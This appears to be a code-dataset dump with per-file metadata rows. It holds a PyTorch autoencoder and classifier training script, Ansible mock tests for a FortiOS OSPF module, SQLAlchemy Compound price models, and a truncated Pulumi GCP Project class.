            class_loss = class_criterion(output, labels)
            recon_loss = recon_criterion(recon_images, images)
            # reconstruction term weighted 10x relative to classification
            total_loss = class_loss + 10*recon_loss
            total_loss.backward()
            #class_loss.backward()
            optimizer.step()
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # accumulate per-sample loss sums; divided by `total` per epoch
            running_recon_loss += float(recon_loss.item() * images.shape[0])
            running_class_loss += float(class_loss.item() * images.shape[0])
            total += images.shape[0]
            #recon_loss = 0
            # free batch tensors eagerly to keep GPU memory bounded
            del images
            del labels
            del recon_images
            del features
            del idx_list
            del output
            del recon_loss
            del class_loss
            del preds
            del total_loss
            torch.cuda.empty_cache()
        val_class_loss, val_recon_loss, val_acc = validate(model, val_loader, recon_criterion, class_criterion, device)
        # NOTE(review): validation total is unweighted while training used
        # class + 10*recon — confirm the asymmetry is intended.
        val_total_loss = val_recon_loss + val_class_loss
        train_recon_loss = running_recon_loss/total
        train_class_loss = running_class_loss/total
        train_total_loss = train_recon_loss + train_class_loss
        train_acc = correct/total
        train_recon_losses.append(train_recon_loss)
        train_class_losses.append(train_class_loss)
        train_accs.append(train_acc)
        val_class_losses.append(val_class_loss)
        val_recon_losses.append(val_recon_loss)
        val_accs.append(val_acc)
        # plateau scheduler keyed on validation classification loss
        scheduler.step(val_class_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Total Loss: {:.5f}, Train Recon Loss: {:.5f}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Total Loss: {:.5f}, Val Recon Loss: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_total_loss, train_recon_loss, train_class_loss, train_acc,
            val_total_loss, val_recon_loss, val_class_loss, val_acc)
        print(to_print)
        # checkpoint every 10 completed epochs (epoch is 0-based)
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'recon_criterion': recon_criterion.state_dict(),
                'class_criterion': class_criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
                'train_class_losses': train_class_losses,
                'train_recon_losses': train_recon_losses,
                'train_accuracy': train_accs,
                'valid_class_losses': val_class_losses,
                'valid_accuracy': val_accs,
                'val_recon_losses': val_recon_losses,
            }
            torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
    return train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs
# validate the multitasking model
def validate(model, val_loader, recon_criterion, class_criterion, device):
    """Evaluate the multitask autoencoder+classifier on `val_loader`.

    NOTE(review): this file defines validate() twice with identical bodies;
    this later definition wins — consider removing one copy.

    Returns:
        (mean class loss, mean recon loss, accuracy) as Python floats.
    """
    model.eval()
    correct = 0
    total = 0
    running_recon_loss = 0
    running_class_loss = 0
    with torch.no_grad():
        for idx, (images, labels) in enumerate(val_loader):
            images, labels = images.to(device), labels.to(device)
            features, idx_list = model.encoder.forward(images)
            output = model.classifier.forward(features)
            recon_images = model.decoder.forward(features, idx_list)
            class_loss = class_criterion(output, labels)
            recon_loss = recon_criterion(recon_images, images)
            running_recon_loss += float(recon_loss.item() * labels.shape[0])
            # Fix: extract the scalar with .item() before weighting, matching
            # the recon accumulation above (previously multiplied the 0-d loss
            # tensor directly before converting to float).
            running_class_loss += float(class_loss.item() * labels.shape[0])
            total += labels.shape[0]
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, recon_images, features, idx_list
            del output, recon_loss, class_loss, preds
            torch.cuda.empty_cache()
    return running_class_loss/total, running_recon_loss/total, correct/total
# only train the autoencoder part of the model
def pretrain(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
    """Train only the autoencoder (encoder + decoder); classifier untouched.

    NOTE(review): this file defines pretrain() twice with identical bodies;
    this later definition wins — consider removing one copy.

    Returns:
        (train_recon_losses, val_recon_losses) — per-epoch mean losses.
    """
    t_start = time.time()
    train_recon_losses = []
    val_recon_losses = []
    for epoch in range(epochs):
        model.train()
        running_recon_loss = 0
        total = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            features, idx_list = model.encoder.forward(images)
            recon_images = model.decoder.forward(features, idx_list)
            recon_loss = criterion(recon_images, images)
            recon_loss.backward()
            optimizer.step()
            # per-sample loss sum; averaged by `total` after the epoch
            running_recon_loss += float(recon_loss.item() * images.shape[0])
            total += images.shape[0]
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, recon_images, features, idx_list, recon_loss
            torch.cuda.empty_cache()
        val_recon_loss = pre_validate(model, val_loader, criterion, device)
        train_recon_loss = running_recon_loss/total
        train_recon_losses.append(train_recon_loss)
        val_recon_losses.append(val_recon_loss)
        scheduler.step(val_recon_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Recon Loss: {:.5f}, Val Recon Loss: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_recon_loss,
            val_recon_loss)
        print(to_print)
        # Consistency fix: checkpoint every 10 *completed* epochs and name the
        # file with that same count, matching train()/train_class(). Previously
        # this saved at epoch 0 and the filename lagged 'train_epochs' by one.
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'recon_criterion': criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
            }
            torch.save(saved_model, 'gdrive/MyDrive/pre_model{}'.format(epoch+1))
    return train_recon_losses, val_recon_losses
# only validate the autoencoder part of the model
def pre_validate(model, val_loader, recon_criterion, device):
    """Return the mean reconstruction loss of the autoencoder over `val_loader`.

    Runs in eval mode with gradients disabled; only the encoder/decoder path
    is exercised (the classifier is never called).
    """
    model.eval()
    loss_sum = 0
    n_seen = 0
    with torch.no_grad():
        for batch_images, batch_labels in val_loader:
            batch_images = batch_images.to(device)
            batch_labels = batch_labels.to(device)
            encoded, pool_indices = model.encoder.forward(batch_images)
            decoded = model.decoder.forward(encoded, pool_indices)
            batch_loss = recon_criterion(decoded, batch_images)
            # per-sample loss sum, averaged by n_seen at the end
            loss_sum += float(batch_loss.item() * batch_labels.shape[0])
            n_seen += batch_images.shape[0]
            # drop per-batch tensors and flush cached GPU memory
            del batch_images, batch_labels, decoded, encoded, pool_indices, batch_loss
            torch.cuda.empty_cache()
    return loss_sum / n_seen
# only train the model's classifier
# NOTE(review): duplicate definition — an identical train_class() appears
# earlier in this file; this later definition is the one Python keeps.
def train_class(model, train_loader, val_loader, criterion, optimizer, scheduler, epochs, device):
    """Train only the classifier head; the encoder provides frozen features.

    The encoder runs forward but its output is `.detach()`ed, so gradients
    never reach it. Validates each epoch via `validate_class`, steps
    `scheduler` on the validation class loss, and checkpoints every 10
    completed epochs.

    Returns four per-epoch lists:
    (train_class_losses, train_accs, val_class_losses, val_accs).
    """
    t_start = time.time()
    train_class_losses = []
    train_accs = []
    val_class_losses = []
    val_accs = []
    for epoch in range(epochs):
        model.train()
        running_class_loss = 0
        total = 0
        correct = 0
        for idx, (images, labels) in enumerate(train_loader):
            images, labels = images.to(device), labels.to(device)
            optimizer.zero_grad()
            features, idx_list = model.encoder.forward(images)
            # detach: block gradient flow into the encoder
            features = features.detach()
            output = model.classifier.forward(features)
            class_loss = criterion(output, labels)
            class_loss.backward()
            optimizer.step()
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # per-sample loss sum; averaged by `total` after the epoch
            running_class_loss += float(class_loss.item() * images.shape[0])
            total += images.shape[0]
            # free batch tensors eagerly to keep GPU memory bounded
            del images
            del labels
            del features
            del idx_list
            del output
            del class_loss
            del preds
            torch.cuda.empty_cache()
        val_class_loss, val_acc = validate_class(model, val_loader, criterion, device)
        train_class_loss = running_class_loss/total
        train_acc = correct/total
        train_class_losses.append(train_class_loss)
        train_accs.append(train_acc)
        val_class_losses.append(val_class_loss)
        val_accs.append(val_acc)
        scheduler.step(val_class_loss)
        to_print = "Epoch: {}/{}, Training Time:{:.2f}, Trained Samples: {}/{}, Train Class Loss: {:.5f} Train Accuracy: {:.5f}, Val Class Loss: {:.5f}, Val Accuracy: {:.5f}".format(
            epoch+1, epochs, time.time()-t_start, total, len(train_loader.dataset), train_class_loss, train_acc,
            val_class_loss, val_acc)
        print(to_print)
        if (epoch+1) % 10 == 0:
            saved_model = {
                'train_epochs': epoch + 1,
                'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'criterion': criterion.state_dict(),
                'scheduler': scheduler.state_dict(),
                'train_class_losses': train_class_losses,
                'train_accuracy': train_accs,
                'valid_class_losses': val_class_losses,
                'valid_accuracy': val_accs,
            }
            # NOTE(review): same filename pattern as train()'s checkpoints
            # ('complete_model<N>') — running both will overwrite; confirm.
            torch.save(saved_model, 'gdrive/MyDrive/complete_model{}'.format(epoch+1))
    return train_class_losses, train_accs, val_class_losses, val_accs
# only validate the model's classifier
def validate_class(model, val_loader, criterion, device):
    """Evaluate only the classifier head (encoder features detached).

    NOTE(review): this file defines validate_class() twice; this later
    definition wins — consider removing one copy.

    Returns:
        (mean class loss, accuracy) averaged over the samples seen.
    """
    model.eval()
    correct = 0
    total = 0
    running_class_loss = 0
    with torch.no_grad():
        for idx, (images, labels) in enumerate(val_loader):
            images, labels = images.to(device), labels.to(device)
            features, idx_list = model.encoder.forward(images)
            features = features.detach()
            output = model.classifier.forward(features)
            # Bug fix: use the `criterion` parameter. The original referenced
            # the global `class_criterion`, which only exists when the file is
            # run as a script — any other caller got a NameError, and even in
            # the script the argument passed in was silently ignored.
            class_loss = criterion(output, labels)
            # .item() for consistency with the training loops' accumulation
            running_class_loss += float(class_loss.item() * labels.shape[0])
            total += labels.shape[0]
            preds = torch.argmax(output, dim=1)
            correct += (preds == labels).sum().item()
            # free batch tensors eagerly to keep GPU memory bounded
            del images, labels, features, idx_list, output, class_loss, preds
            torch.cuda.empty_cache()
    return running_class_loss/total, correct/total
if __name__ == '__main__':
    # NOTE(review): `splitfolders`, `AutoClassifier`, `make_plots` and
    # `compare` are not defined or imported in this file — presumably
    # supplied by a companion module/notebook cell; confirm before running
    # this script standalone.
    # Split 'test' 50/50 into val_test/val and val_test/test.
    splitfolders.ratio('test', output='val_test', seed=1337, ratio=(0, 0.5, 0.5), group_prefix=None)
    # check for GPU
    cuda = torch.cuda.is_available()
    device = torch.device('cuda' if cuda else 'cpu')
    print(device)
    train_loader, dev_loader, test_loader = preprocessing()
    """# Dimensionality Reduction """
    model = AutoClassifier()
    model.to(device)
    criterion = nn.MSELoss()
    epochs = 80
    optimizer = torch.optim.Adam(model.parameters(), lr=5e-2)
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
    # train the encoder and decoder
    pre_train_loss, pre_val_loss = pretrain(model, train_loader, dev_loader, criterion, optimizer, scheduler, epochs, device)
    make_plots(pre_train_loss, pre_val_loss, "Autoencoder", "Loss")
    # compare a reconstructed image with the original image.
    # Bug fix: `train_dataset` was never in scope here (preprocessing returns
    # only loaders) — use the dataset attached to the train loader instead.
    fixed_x = train_loader.dataset[random.randint(1, 100)][0].unsqueeze(0).to(device)
    compare_x = compare(fixed_x)
    save_image(compare_x.data.cpu(), 'sample_image.png')
    display(Image('sample_image.png', width=700, unconfined=True))
    # train the classifier head on frozen encoder features
    class_criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
    # Bug fix: was `epoch = 80` — a dead assignment (typo for `epochs`); the
    # train_class call below reads `epochs`.
    epochs = 80
    train_class_losses, train_accs, val_class_losses, val_accs = train_class(model, train_loader, dev_loader, class_criterion, optimizer, scheduler, epochs, device)
    make_plots(train_accs, val_accs, "Classifier", "Accuracy")
    """# Train and Test the Multitasking Model"""
    model = AutoClassifier()
    model.to(device)
    recon_criterion = nn.MSELoss()
    class_criterion = nn.CrossEntropyLoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.75, patience=2, verbose=True)
    epochs = 100
    train_recon_losses, train_class_losses, train_accs, val_class_losses, val_recon_losses, val_accs = train(model, train_loader, dev_loader, recon_criterion, class_criterion, optimizer, scheduler, epochs, device)
    _, _, test_acc = validate(model, test_loader, recon_criterion, class_criterion, device)
    # Fix: test accuracy was computed but never reported.
    print('test accuracy: {:.5f}'.format(test_acc))
| 43.541478
| 282
| 0.607316
| 3,350
| 28,868
| 4.974925
| 0.062687
| 0.050762
| 0.023041
| 0.022681
| 0.904356
| 0.887436
| 0.874715
| 0.866555
| 0.866555
| 0.862715
| 0
| 0.012325
| 0.294548
| 28,868
| 662
| 283
| 43.607251
| 0.80604
| 0.021408
| 0
| 0.889081
| 0
| 0.010399
| 0.074773
| 0.006348
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02253
| false
| 0
| 0.034662
| 0
| 0.079723
| 0.02773
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7b8565d094a2eb2295d9470ea25d2d3a1bbff33
| 12,710
|
py
|
Python
|
v6.0.5/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 14
|
2018-09-25T20:35:25.000Z
|
2021-07-14T04:30:54.000Z
|
v6.0.6/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 32
|
2018-10-09T04:13:42.000Z
|
2020-05-11T07:20:28.000Z
|
v6.0.5/router/test_fortios_router_ospf.py
|
fortinet-solutions-cse/ansible_fgt_modules
|
c45fba49258d7c9705e7a8fd9c2a09ea4c8a4719
|
[
"Apache-2.0"
] | 11
|
2018-10-09T00:14:53.000Z
|
2021-11-03T10:54:09.000Z
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_ospf
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    """Auto-applied fixture: patch the Connection class used by the module."""
    patched_connection = mocker.patch(
        'ansible.modules.network.fortios.fortios_router_ospf.Connection')
    return patched_connection
fos_instance = FortiOSHandler(connection_mock)
def test_router_ospf_creation(mocker):
    """A successful POST maps underscored args to dashed keys and reports changed."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    post_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=post_result)

    module_args = {
        'username': 'admin',
        'state': 'present',
        'router_ospf': {
            'abr_type': 'cisco',
            'auto_cost_ref_bandwidth': '4',
            'bfd': 'enable',
            'database_overflow': 'enable',
            'database_overflow_max_lsas': '7',
            'database_overflow_time_to_recover': '8',
            'default_information_metric': '9',
            'default_information_metric_type': '1',
            'default_information_originate': 'enable',
            'default_information_route_map': 'test_value_12',
            'default_metric': '13',
            'distance': '14',
            'distance_external': '15',
            'distance_inter_area': '16',
            'distance_intra_area': '17',
            'distribute_list_in': 'test_value_18',
            'distribute_route_map_in': 'test_value_19',
            'log_neighbour_changes': 'enable',
            'restart_mode': 'none',
            'restart_period': '22',
            'rfc1583_compatible': 'enable',
            'router_id': 'test_value_24',
            'spf_timers': 'test_value_25',
        },
        'vdom': 'root'}

    error_flag, did_change, result = fortios_router_ospf.fortios_router(module_args, fos_instance)

    # payload the module should have sent: same values, dash-separated keys
    expected_payload = {
        'abr-type': 'cisco',
        'auto-cost-ref-bandwidth': '4',
        'bfd': 'enable',
        'database-overflow': 'enable',
        'database-overflow-max-lsas': '7',
        'database-overflow-time-to-recover': '8',
        'default-information-metric': '9',
        'default-information-metric-type': '1',
        'default-information-originate': 'enable',
        'default-information-route-map': 'test_value_12',
        'default-metric': '13',
        'distance': '14',
        'distance-external': '15',
        'distance-inter-area': '16',
        'distance-intra-area': '17',
        'distribute-list-in': 'test_value_18',
        'distribute-route-map-in': 'test_value_19',
        'log-neighbour-changes': 'enable',
        'restart-mode': 'none',
        'restart-period': '22',
        'rfc1583-compatible': 'enable',
        'router-id': 'test_value_24',
        'spf-timers': 'test_value_25',
    }
    set_mock.assert_called_with('router', 'ospf', data=expected_payload, vdom='root')
    schema_mock.assert_not_called()
    assert not error_flag
    assert did_change
    assert result['status'] == 'success'
    assert result['http_status'] == 200
def test_router_ospf_creation_fails(mocker):
    """A 500 from the device must surface as an error with changed=False."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    failed_post = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
    set_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=failed_post)

    module_args = {
        'username': 'admin',
        'state': 'present',
        'router_ospf': {
            'abr_type': 'cisco',
            'auto_cost_ref_bandwidth': '4',
            'bfd': 'enable',
            'database_overflow': 'enable',
            'database_overflow_max_lsas': '7',
            'database_overflow_time_to_recover': '8',
            'default_information_metric': '9',
            'default_information_metric_type': '1',
            'default_information_originate': 'enable',
            'default_information_route_map': 'test_value_12',
            'default_metric': '13',
            'distance': '14',
            'distance_external': '15',
            'distance_inter_area': '16',
            'distance_intra_area': '17',
            'distribute_list_in': 'test_value_18',
            'distribute_route_map_in': 'test_value_19',
            'log_neighbour_changes': 'enable',
            'restart_mode': 'none',
            'restart_period': '22',
            'rfc1583_compatible': 'enable',
            'router_id': 'test_value_24',
            'spf_timers': 'test_value_25',
        },
        'vdom': 'root'}

    error_flag, did_change, result = fortios_router_ospf.fortios_router(module_args, fos_instance)

    # payload the module should have sent: same values, dash-separated keys
    expected_payload = {
        'abr-type': 'cisco',
        'auto-cost-ref-bandwidth': '4',
        'bfd': 'enable',
        'database-overflow': 'enable',
        'database-overflow-max-lsas': '7',
        'database-overflow-time-to-recover': '8',
        'default-information-metric': '9',
        'default-information-metric-type': '1',
        'default-information-originate': 'enable',
        'default-information-route-map': 'test_value_12',
        'default-metric': '13',
        'distance': '14',
        'distance-external': '15',
        'distance-inter-area': '16',
        'distance-intra-area': '17',
        'distribute-list-in': 'test_value_18',
        'distribute-route-map-in': 'test_value_19',
        'log-neighbour-changes': 'enable',
        'restart-mode': 'none',
        'restart-period': '22',
        'rfc1583-compatible': 'enable',
        'router-id': 'test_value_24',
        'spf-timers': 'test_value_25',
    }
    set_mock.assert_called_with('router', 'ospf', data=expected_payload, vdom='root')
    schema_mock.assert_not_called()
    assert error_flag
    assert not did_change
    assert result['status'] == 'error'
    assert result['http_status'] == 500
def test_router_ospf_idempotent(mocker):
    """A 404 from the set() call must surface as "no error, no change" (idempotent)."""
    schema_method_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
    set_method_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    ospf_config = {
        'abr_type': 'cisco',
        'auto_cost_ref_bandwidth': '4',
        'bfd': 'enable',
        'database_overflow': 'enable',
        'database_overflow_max_lsas': '7',
        'database_overflow_time_to_recover': '8',
        'default_information_metric': '9',
        'default_information_metric_type': '1',
        'default_information_originate': 'enable',
        'default_information_route_map': 'test_value_12',
        'default_metric': '13',
        'distance': '14',
        'distance_external': '15',
        'distance_inter_area': '16',
        'distance_intra_area': '17',
        'distribute_list_in': 'test_value_18',
        'distribute_route_map_in': 'test_value_19',
        'log_neighbour_changes': 'enable',
        'restart_mode': 'none',
        'restart_period': '22',
        'rfc1583_compatible': 'enable',
        'router_id': 'test_value_24',
        'spf_timers': 'test_value_25',
    }
    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_ospf': ospf_config,
        'vdom': 'root',
    }

    is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)

    # The module forwards every option with its FortiOS hyphenated key;
    # values pass through untouched.
    expected_data = {key.replace('_', '-'): value for key, value in ospf_config.items()}

    set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_router_ospf_filter_foreign_attributes(mocker):
    """Attributes that are not part of the router_ospf schema must be dropped
    before the payload reaches FortiOSHandler.set()."""
    schema_method_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_method_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    foreign_key = 'random_attribute_not_valid'
    ospf_config = {
        foreign_key: 'tag',
        'abr_type': 'cisco',
        'auto_cost_ref_bandwidth': '4',
        'bfd': 'enable',
        'database_overflow': 'enable',
        'database_overflow_max_lsas': '7',
        'database_overflow_time_to_recover': '8',
        'default_information_metric': '9',
        'default_information_metric_type': '1',
        'default_information_originate': 'enable',
        'default_information_route_map': 'test_value_12',
        'default_metric': '13',
        'distance': '14',
        'distance_external': '15',
        'distance_inter_area': '16',
        'distance_intra_area': '17',
        'distribute_list_in': 'test_value_18',
        'distribute_route_map_in': 'test_value_19',
        'log_neighbour_changes': 'enable',
        'restart_mode': 'none',
        'restart_period': '22',
        'rfc1583_compatible': 'enable',
        'router_id': 'test_value_24',
        'spf_timers': 'test_value_25',
    }
    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_ospf': ospf_config,
        'vdom': 'root',
    }

    is_error, changed, response = fortios_router_ospf.fortios_router(input_data, fos_instance)

    # Everything except the foreign attribute is forwarded, keyed with the
    # FortiOS hyphenated form of each option name.
    expected_data = {
        key.replace('_', '-'): value
        for key, value in ospf_config.items()
        if key != foreign_key
    }

    set_method_mock.assert_called_with('router', 'ospf', data=expected_data, vdom='root')
    schema_method_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
| 37.827381
| 133
| 0.617624
| 1,401
| 12,710
| 5.307637
| 0.149893
| 0.048413
| 0.047337
| 0.030258
| 0.859064
| 0.846961
| 0.834185
| 0.834185
| 0.834185
| 0.834185
| 0
| 0.028778
| 0.239969
| 12,710
| 335
| 134
| 37.940299
| 0.740994
| 0.052242
| 0
| 0.877256
| 0
| 0
| 0.458188
| 0.210474
| 0
| 0
| 0
| 0
| 0.086643
| 1
| 0.018051
| false
| 0
| 0.028881
| 0
| 0.050542
| 0.00361
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7961828e0c3e67b6b407fa3c58aaef9ade02bc9
| 1,142
|
py
|
Python
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 7
|
2020-04-28T02:17:51.000Z
|
2020-09-23T17:39:38.000Z
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 1
|
2020-08-10T19:39:12.000Z
|
2020-08-10T19:39:12.000Z
|
src/models/compound.py
|
Dragonfly-Capital/oracles.club.server
|
092dc1e6d205ceb475cd65f9b1c3e4aa6ef588dd
|
[
"MIT"
] | 2
|
2020-05-10T09:39:47.000Z
|
2020-07-27T18:12:23.000Z
|
from .create_db import db
class CompoundETH(db.Model):
    """ORM row holding one Compound ETH price observation."""
    __tablename__ = 'compound'

    id = db.Column('id', db.Integer, primary_key=True)  # surrogate key
    blocknumber = db.Column('blocknumber', db.Integer)
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        # Comma-separated "<block>, <timestamp>, <price>" rendering.
        return f'{self.blocknumber}, {self.timestamp}, {self.price}'
class CompoundBTC(db.Model):
    """ORM row holding one Compound BTC price observation."""
    __tablename__ = 'compoundbtc'

    id = db.Column('id', db.Integer, primary_key=True)  # surrogate key
    blocknumber = db.Column('blocknumber', db.Integer)
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        # Comma-separated "<block>, <timestamp>, <price>" rendering.
        return f'{self.blocknumber}, {self.timestamp}, {self.price}'
class CompoundBAT(db.Model):
    """ORM row holding one Compound BAT price observation."""
    __tablename__ = 'compoundbat'

    id = db.Column('id', db.Integer, primary_key=True)  # surrogate key
    blocknumber = db.Column('blocknumber', db.Integer)
    timestamp = db.Column('timestamp', db.Integer)
    price = db.Column('price', db.Float)

    def __repr__(self):
        # Comma-separated "<block>, <timestamp>, <price>" rendering.
        return f'{self.blocknumber}, {self.timestamp}, {self.price}'
| 32.628571
| 80
| 0.661996
| 137
| 1,142
| 5.313869
| 0.189781
| 0.131868
| 0.065934
| 0.049451
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0.813187
| 0
| 0
| 0.174256
| 1,142
| 34
| 81
| 33.588235
| 0.772004
| 0
| 0
| 0.72
| 0
| 0
| 0.123468
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.12
| false
| 0
| 0.04
| 0.12
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
54003ebc336e679915dcaaaf5a9466d49a4251af
| 34,176
|
py
|
Python
|
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/organizations/project.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['ProjectArgs', 'Project']
@pulumi.input_type
class ProjectArgs:
    # Auto-generated input bag for the gcp:organizations/project:Project
    # resource. Each attribute is stored via pulumi.set/pulumi.get so that
    # values may be plain Python values or pulumi Inputs (Outputs of other
    # resources).
    def __init__(__self__, *,
                 project_id: pulumi.Input[str],
                 auto_create_network: Optional[pulumi.Input[bool]] = None,
                 billing_account: Optional[pulumi.Input[str]] = None,
                 folder_id: Optional[pulumi.Input[str]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 org_id: Optional[pulumi.Input[str]] = None,
                 skip_delete: Optional[pulumi.Input[bool]] = None):
        """
        The set of arguments for constructing a Project resource.

        :param pulumi.Input[str] project_id: The project ID. Changing this forces a new project to be created.
        :param pulumi.Input[bool] auto_create_network: Create the 'default' network automatically. Default `true`.
               If set to `false`, the default network will be deleted. Note that, for quota purposes, you
               will still need to have 1 network slot available to create the project successfully, even if
               you set `auto_create_network` to `false`, since the network will exist momentarily.
        :param pulumi.Input[str] billing_account: The alphanumeric ID of the billing account this project
               belongs to. The user or service account performing this operation with the provider
               must have at minimum Billing Account User privileges (`roles/billing.user`) on the billing account.
               See [Google Cloud Billing API Access Control](https://cloud.google.com/billing/docs/how-to/billing-access)
               for more details.
        :param pulumi.Input[str] folder_id: The numeric ID of the folder this project should be
               created under. Only one of `org_id` or `folder_id` may be
               specified. If the `folder_id` is specified, then the project is
               created under the specified folder. Changing this forces the
               project to be migrated to the newly specified folder.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the project.
        :param pulumi.Input[str] name: The display name of the project.
